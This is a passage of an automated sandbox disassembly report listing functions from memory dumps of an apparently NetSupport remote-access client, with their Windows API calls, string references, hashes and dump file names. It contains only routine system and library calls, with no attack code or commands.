Opcode ID: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
Instruction ID: 33cf1931661e2960d377c619dd89904b97ea319b13ae6f8f8dcb9591a9c6775e
Opcode Fuzzy Hash: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
Instruction Fuzzy Hash: 60E0927A6012187FD210961B9C89F9BBB2DDB856A4F000069FD1487201C972EC1082B0

Function 110ED160 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D

Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B

Strings

Error %d closing regkey %x, xrefs: 110ED17D

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: Closewvsprintf
String ID: Error %d closing regkey %x
API String ID: 843752472-892920262
Opcode ID: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
Instruction ID: 72b2cf3cdd4b8fd577e25b07e2838f9a8e734d144b1f96517ba84771a8eadcbb
Opcode Fuzzy Hash: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
Instruction Fuzzy Hash: 4EE08679A022126BD3289A1EAC18F5BB6E8DFC4300F1604ADF850C3240DA70D8018664

Function 111463D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(NSMTRACE,?,1102DE54,11026580,0316B898,?,?,?,00000100,?,?,00000009), ref: 111463E9

Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA

Strings

NSMTRACE, xrefs: 111463E4

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: NSMTRACE
API String ID: 4133054770-4175627554
Opcode ID: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
Instruction ID: cf49eb18fee32400038a48a9d82a087192b912de878353ac6c822cd252c7dc11
Opcode Fuzzy Hash: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
Instruction Fuzzy Hash: 50D05EB520033BCFDB489F7995B4269F7EAAB4CA1D3540075E469C2A07EBB0D848C714

Function 6D1C4F70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll,?,6D1C8DC8), ref: 6D1C4F78

Strings

psapi.dll, xrefs: 6D1C4F71

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: psapi.dll
API String ID: 1029625771-80456845
Opcode ID: c316640451f23893462dbe31da6c1cd64cf63c1b448d883d61dcb4a8418ef400
Instruction ID: 6d8a677efc8f2b0e1ab5e0c105945d6378754845166fa22823a3e433a5e62d0e
Opcode Fuzzy Hash: c316640451f23893462dbe31da6c1cd64cf63c1b448d883d61dcb4a8418ef400
Instruction Fuzzy Hash: 0CE001B1901B108F93B0CF3AA604643BAF0BB186503118A2E909EC3A00E370A585CF90

Function 11025CD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll,?,110302C4), ref: 11025CD8

Strings

psapi.dll, xrefs: 11025CD1

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: psapi.dll
API String ID: 1029625771-80456845
Opcode ID: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
Instruction ID: d2f0b82a95d6fc878682dccaf19b7a180456f678ee46f3fe844c8dbdc6f5fb44
Opcode Fuzzy Hash: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
Instruction Fuzzy Hash: C9E001B1A11B248FC3B4CF3AA844642FAF0BB18A103118A3ED4AEC3A00E330A5448F80

Function 6D1C5C90 Relevance: 3.1, APIs: 2, Instructions: 66COMMON

Download Yara Rule

APIs

ioctlsocket.WSOCK32(92DF34B3,4004667F,00000000,-000397EB), ref: 6D1C5D1F
select.WSOCK32(00000001,?,00000000,?,00000000,92DF34B3,4004667F,00000000,-000397EB), ref: 6D1C5D62

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: ioctlsocketselect
String ID:
API String ID: 1457273030-0
Opcode ID: b940b5cd7bb554e3ec92620cb12e7d31b6711ca73b2bd2cf6b34681ec584d529
Instruction ID: 3632af6fd4c1de518cb27a1af7f9b473530e8af4b7314bcee4ecffd3f8a6d231
Opcode Fuzzy Hash: b940b5cd7bb554e3ec92620cb12e7d31b6711ca73b2bd2cf6b34681ec584d529
Instruction Fuzzy Hash: E9213071A003188BEB28CF14C958BEDB7B9EF48304F4081DAA90D97285DBB45F94DF91

Function 1105FCF0 Relevance: 3.1, APIs: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477

std::exception::exception.LIBCMT ref: 1105FD93
__CxxThrowException@8.LIBCMT ref: 1105FDA8

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
String ID:
API String ID: 1338273076-0
Opcode ID: 1f80237bb8b33227715ec78827a33b9d1a9a742048f9e05dafa60b126eb6fb5b
Instruction ID: 65be3d9b06008521879bde957bfb15225efad016ffb254945ac63f30ffb56918
Opcode Fuzzy Hash: 1f80237bb8b33227715ec78827a33b9d1a9a742048f9e05dafa60b126eb6fb5b
Instruction Fuzzy Hash: F5117FBA900619ABC710CF99C940ADAF7F8FB48614F10862EE91997740E774B900CBE1

Function 110883D0 Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 110883EF
InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070993,00000000,00000000,1118201E,000000FF), ref: 11088460

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection_memset
String ID:
API String ID: 453477542-0
Opcode ID: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
Instruction ID: 54b2584c526ac61f8aa3306390e259e673957fd90be6398fea32980b523eb801
Opcode Fuzzy Hash: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
Instruction Fuzzy Hash: EE1157B0911B148FC3A4CF7A88817C7FBE5BB58310F80892E96EEC2200DB716664CF94

Function 11144440 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11144461
ExtractIconExA.SHELL32(?,00000000,00030443,00040449,00000001), ref: 11144498

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: ExtractFileIconModuleName
String ID:
API String ID: 3911389742-0
Opcode ID: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
Instruction ID: eab236796224ce85d4984e15688285b8376dcc0e4438f4162dfbb4c1a1faa056
Opcode Fuzzy Hash: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
Instruction Fuzzy Hash: 3EF0F0787581189FE708DFA0C892FF9B369F794709F444269E912C6184CE706A4C8B51

Function 11163DB7 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF

__lock_file.LIBCMT ref: 11163DFE

Part of subcall function 1116AF99: __lock.LIBCMT ref: 1116AFBE

__fclose_nolock.LIBCMT ref: 11163E09

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
Instruction ID: 92e00479c768bfe57184568fb50af5c8f285ad3b4a4164507b2fffc520e9ca87
Opcode Fuzzy Hash: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
Instruction Fuzzy Hash: 5CF0F6348143079ED7119B79D80078EFBA86F0033CF518248C0289A0C0CBFA6521CE56

Function 6D1D6C1E Relevance: 3.0, APIs: 2, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 6D1D6C26
Sleep.KERNEL32(00000064), ref: 6D1D6C5B

Part of subcall function 6D1D6940: GetTickCount.KERNEL32 ref: 6D1D6950

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: CountTick$Sleep
String ID:
API String ID: 4250438611-0
Opcode ID: 67d0535f9917eda0a66b98e87cebc8e18bfd1550bcaf1cebbbb9a70a7bd862fa
Instruction ID: 0abc4f845f824d36ed78952968282f56f0fdb4b6e73539f4192c6b0462dbd307
Opcode Fuzzy Hash: 67d0535f9917eda0a66b98e87cebc8e18bfd1550bcaf1cebbbb9a70a7bd862fa
Instruction Fuzzy Hash: 1FF0827260420DCFDF54EFB5D65872AB3B1EB6231DF12006EC51296594CBF86880DB82

Function 6D1C63A0 Relevance: 3.0, APIs: 2, Instructions: 10sleepnetworkCOMMON

Download Yara Rule

APIs

WSACancelBlockingCall.WSOCK32 ref: 6D1C63A9
Sleep.KERNEL32(00000032), ref: 6D1C63B3

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: BlockingCallCancelSleep
String ID:
API String ID: 3706969569-0
Opcode ID: a78e0ebd2e21b0b6b15878bfe2d6be3d21108b9b62dea694f5035bc569092ea6
Instruction ID: 29ed3d0e612924bdcfd900e5597778fd01387730c6428399cd2f7b0deeda7e32
Opcode Fuzzy Hash: a78e0ebd2e21b0b6b15878bfe2d6be3d21108b9b62dea694f5035bc569092ea6
Instruction Fuzzy Hash: 5AB0926029521549EB0017720A0A33A20990FE628BF525464AB5AC849DEFE8C140A0A2

Function 11143000 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,76938400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
Instruction ID: 1cdda14904265755d753c391d3c49599355d775305d59026304f2c7825c43cec
Opcode Fuzzy Hash: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
Instruction Fuzzy Hash: 5D1193716282655AEB218E14D690BAFFBAAEFC5B24F30836AE51547E04C3329886C750

Function 6D1EA082 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,6D1E6F16,00000000,?,6D1ED40B,00000001,6D1E6F16,00000000,00000000,00000000,?,6D1E6F16,00000001,00000214), ref: 6D1EA0C5

Part of subcall function 6D1E60F9: __getptd_noexit.LIBCMT ref: 6D1E60F9

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: d251bd1d6fe16649234cc37b882a0f385d5cc895ea6703bac402ee7f8f5d836d
Instruction ID: 4a2cbaf451d3fc17a60077e9f90feb62d2d2e19fff547daed9750e1f99a1b2c0
Opcode Fuzzy Hash: d251bd1d6fe16649234cc37b882a0f385d5cc895ea6703bac402ee7f8f5d836d
Instruction Fuzzy Hash: 6101B131305A179EEB158FA5CC54F6737B8AB927E4F014529E926CB188DBF5A440C690

Function 11170166 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,110310DF,00000000,?,11169DD4,?,110310DF,00000000,00000000,00000000,?,1116B767,00000001,00000214,?,1110F4AE), ref: 111701A9

Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
Instruction ID: 37eba9f6ddbe8283f17829f7b0a109b8136aa2f13792341ea1fc2e0acbbf6d66
